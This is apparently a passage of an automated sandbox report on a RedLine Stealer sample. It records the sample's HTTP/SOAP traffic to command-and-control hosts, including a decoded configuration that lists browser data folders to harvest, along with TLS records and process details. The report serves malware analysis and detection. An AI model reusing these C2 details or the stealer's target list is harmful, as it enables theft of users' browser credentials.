                                                                                                                                                                                              Data Raw: 31 35 63 0d 0a 1f 8b 08 00 00 00 00 00 02 03 5d 92 51 4b c3 30 10 c7 bf 8a 14 f6 68 d3 6d a0 b4 74 81 cd 4d 11 14 c4 39 f1 c1 97 ac 3d b6 b0 34 29 b9 eb 5a c1 0f 6f 12 db 39 d7 a7 bb ff ff ee 77 b9 26 39 66 2b 7d 04 65 6a b8 ea 2a a5 31 c3 59 b4 27 aa 33 c6 b0 d8 43 25 30 76 3a 1a 51 c7 c6 ee 98 0f 18 f4 1d 2c e2 39 66 0b 53 7e f1 fc 01 68 53 97 82 00 5f 01 6b a3 b1 e7 9d 68 04 55 dd 58 19 28 d1 45 7d a3 a8 9f 2e 66 d1 c2 9a 16 c1 ae 3a 02 8d d2 e8 a8 b7 e4 09 d5 b6 6d dc 4e 03 69 92 24 63 f6 f1 fc b4 0e 67 bd 96 1a 49 e8 02 dc 00 91 fd f2 df 04 1e 7c 36 2f c8 c1 f8 d2 b4 5a 19 51 ce 75 b9 ea 72 76 d2 5d c5 5d 63 2d 68 e2 e3 64 e2 8d 21 75 ce d2 54 42 ea 7b a9 08 2c f3 c2 bf 50 0b f5 62 a4 ab 4c 6f 93 f0 f9 ee 33 d9 15 ad 49 50 83 dc cf 3a 82 b7 7b c1 59 fe 7c 73 bb e3 7e 37 74 cb 6d 25 6d 9b e2 00 14 f6 53 8d 44 51 ba f1 69 9a 32 51 56 52 b3 b2 df 00 d9 4d 0c 1d 7c 8f a8 aa 47 9f 68 8f e8 53 0f 1f 90 3d fd 71 c9 a7 83 ec 62 a7 be 4b 94 5b 05 9c 6c 13 1a 86 dc c7 e7 7f 8d 5d de d2 a5 14 2e da 89 c3 2b 60 7f cf 89 ff 00 2d b9 77 e7 5b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 15c]QK0hmtM9=4)Zo9w&9f+}ej*1Y'3C%0v:Q,9fS~hS_khUX(E}.f:mNi$cgI|6/ZQurv]]c-hd!uTB{,PbLo3IP:{Y|s~7tm%mSDQi2QVRM|GhS=qbK[l].+`-w[0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              3192.168.2.349748212.224.105.10580C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:39:20.844013929 CEST13048OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"
                                                                                                                                                                                              Host: yspasenana.xyz
                                                                                                                                                                                              Content-Length: 1151267
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Jul 22, 2021 11:39:20.891258955 CEST13048INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:39:21.477404118 CEST14184INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:21 GMT
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Keep-Alive: timeout=3
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 8e cb 0a 83 30 10 45 7f a5 e4 03 9c 7d 48 b3 28 f8 03 82 dd 07 1d 1f 60 32 43 6e 2a f5 ef 6b 45 db dd e5 c0 39 5c 07 5b a7 95 17 51 be bd e3 92 60 71 37 53 29 6a 89 d0 4d 1c 03 aa 9d 43 82 56 92 47 fa 0e e2 d3 20 e3 1d ec 43 fa cd bb 27 e7 79 d8 5a ed 43 e1 86 a1 92 70 16 7f bd c2 51 5f 79 3e 3a 86 bc a3 cb a5 ff 09 ff 01 0a 0b 8d ee 91 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7fE0E}H(`2Cn*kE9\[Q`q7S)jMCVG C'yZCpQ_y>:0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              4192.168.2.3497515.149.255.20332800C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:39:44.921303988 CEST14205OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                                              Host: 5.149.255.203:32800
                                                                                                                                                                                              Content-Length: 144
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 22, 2021 11:39:44.983942032 CEST14206INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:39:45.058398962 CEST14207INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Length: 4750
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:39 GMT
                                                                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65
                                                                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>false</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Ce


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              5192.168.2.3497535.149.255.20332800C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:40:01.361423016 CEST14220OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                              Host: 5.149.255.203:32800
                                                                                                                                                                                              Content-Length: 1151929
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Jul 22, 2021 11:40:01.424666882 CEST14220INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:40:02.236315966 CEST15445INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Length: 147
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:56 GMT
                                                                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              6192.168.2.3497545.149.255.20332800C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 22, 2021 11:40:02.306895018 CEST15446OUTPOST / HTTP/1.1
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                              Host: 5.149.255.203:32800
                                                                                                                                                                                              Content-Length: 1151921
                                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 22, 2021 11:40:02.369169950 CEST15446INHTTP/1.1 100 Continue
                                                                                                                                                                                              Jul 22, 2021 11:40:02.905472040 CEST16605INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Length: 261
                                                                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                              Date: Thu, 22 Jul 2021 09:39:56 GMT
                                                                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027946949 CEST88.99.66.31443192.168.2.349714CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                              Jul 22, 2021 11:37:58.516778946 CEST104.25.233.53443192.168.2.349715CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jun 11 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Sat Jun 11 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155395031 CEST104.192.141.1443192.168.2.349716CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 27 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Mon May 23 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939636946 CEST52.216.94.27443192.168.2.349717CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 11 01:00:00 CET 2021 Tue Dec 08 13:05:07 CET 2015Sat Feb 12 00:59:59 CET 2022 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025
                                                                                                                                                                                              Jul 22, 2021 11:39:14.152019978 CEST104.192.141.1443192.168.2.349746CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 27 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Mon May 23 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                                                                                              CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                              Jul 22, 2021 11:39:15.092914104 CEST52.217.80.20443192.168.2.349747CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 11 01:00:00 CET 2021 Tue Dec 08 13:05:07 CET 2015Sat Feb 12 00:59:59 CET 2022 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                                                                                              CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:37:56
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:'C:\Users\user\Desktop\Nb2HQZZDIf.exe'
                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                              File size:627616 bytes
                                                                                                                                                                                              MD5 hash:B8371590264DB62ECBBA4B7F481A21A8
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:38:01
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                                                              File size:979968 bytes
                                                                                                                                                                                              MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 33%, ReversingLabs
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:38:43
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:{path}
                                                                                                                                                                                              Imagebase:0x2e0000
                                                                                                                                                                                              File size:979968 bytes
                                                                                                                                                                                              MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:38:43
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:{path}
                                                                                                                                                                                              Imagebase:0x680000
                                                                                                                                                                                              File size:979968 bytes
                                                                                                                                                                                              MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:39:19
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\srvs.exe'
                                                                                                                                                                                              Imagebase:0xdf0000
                                                                                                                                                                                              File size:3859368 bytes
                                                                                                                                                                                              MD5 hash:D11C21AB3E969F79E3C783FDD97E1C10
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
